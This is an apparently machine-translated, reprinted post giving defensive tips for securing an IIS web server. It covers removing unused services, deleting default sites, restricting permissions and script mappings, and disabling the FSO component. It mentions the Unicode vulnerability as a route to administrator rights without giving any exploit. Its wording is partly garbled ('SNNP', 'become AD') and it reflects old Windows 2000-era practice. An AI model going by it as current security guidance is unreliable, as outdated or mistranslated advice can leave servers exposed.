If you need to use IIS to build a site to promote your own private server, you must configure IIS securely as follows.

Among the IIS components, first remove the SMTP, SNNP and FTP services you do not need; this reduces the CPU and memory your server uses. Then I suggest deleting all content under the c:\inetpub\ directory, or changing the path. Delete the default site in IIS Manager (or delete this virtual directory), because this directory has permissions. In the newly created web site, set the IIS permissions so that it cannot write or run. IIS supports ASP scripts by default. Then delete unwanted mappings in IIS; this is important. If you want to support PHP or CGI scripts, you have to configure the correct mappings for the PHP and CGI applications. Disable or delete the FSO component (last year's window was hacked using FSO ...). If you want to use FSO, it is best to rename it! Otherwise, if you provide home page space to others, you will definitely be hacked. Be careful!

At present, when Internet hosting space is hacked, exploiting IIS vulnerabilities to raise one's own permissions and become AD is a quick and easy task; it does not take days of brute-force password cracking, and cases like this on web servers are not rare. There are too many articles online about using the Unicode vulnerability to gain AD permissions, so I will not say much.

These are only examples of server security precautions. To really run a server safely, you need to spend a lot of time exploring, because these are enough to cope with some ..... Of course, if you need a web server, I still recommend AP: it is open source, free, and much more secure and stable than IIS. If you have more to discuss with me, you can contact me directly, about Linux security, AP, anti-hacking for 2000, and tracking hacker attacks.

When reprinting, please cite the original address: https://www.9cbs.com/read-36952.html
